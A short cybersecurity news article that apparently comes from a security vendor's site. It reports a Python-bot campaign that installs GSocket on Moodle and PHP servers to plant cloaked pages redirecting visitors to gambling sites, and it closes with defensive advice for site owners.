HQ/EMEAFind out how we can help your business
A surge of cyberattacks that use Python-based bots that target thousands of websites has boosted various gambling-related websites.
Researchers revealed that this campaign is involved with gambling platforms in Indonesia and targets web servers operating in PHP-based apps. Moreover, the campaign could be coordinated in response to increased government surveillance of the online gambling industry.
The initial assessment of the attack noticed millions of requests from a Python client that included a command to install the open-source application GSocket, which can establish a communication channel between two devices regardless of network boundaries.
GSocket has recently been used by various cybercriminal groups in several cryptojacking operations, including exploiting the utility’s access to place malicious JavaScript code on websites to steal payment information.
Hackers commonly use Python-based bots to target servers that run on a specific LMS.
The attack chain of this new cybercriminal activity, which leverages Python-based bots, includes efforts to launch GSocket using pre-existing web shells installed on already infected servers. However, most of its operations targeted servers that run the popular learning management system (LMS) Moodle.
In addition, the attacks include changes to the ‘crontab’ and ‘bashrc’ system files to ensure that GSocket continues to run even after the web shells are removed.
The research also uncovered that the threat actors are utilising the access granted by GSocket to these target servers to distribute PHP files containing HTML content referring to online gambling services explicitly distributed to Indonesian customers.
The top of each PHP file had PHP code that allowed only search bots to see the website, while regular site visitors were redirected to another URL. The tactic’s objective is to target users looking for known gambling services and then redirect them to another domain.
The researchers claimed that the redirections land on a popular Indonesian gambling website called “pktoto[.]cc.”
The development comes after separate research uncovered a large-scale malware campaign that targeted over 5,000 sites worldwide to create illegal admin accounts, install a malicious plugin from a remote server, and siphon credential data back to it.
Therefore, WordPress site owners should update their plugins, block rogue domains using a firewall, scan for strange admin accounts or plugins, and remove them to counteract these ongoing cybercriminal activities.
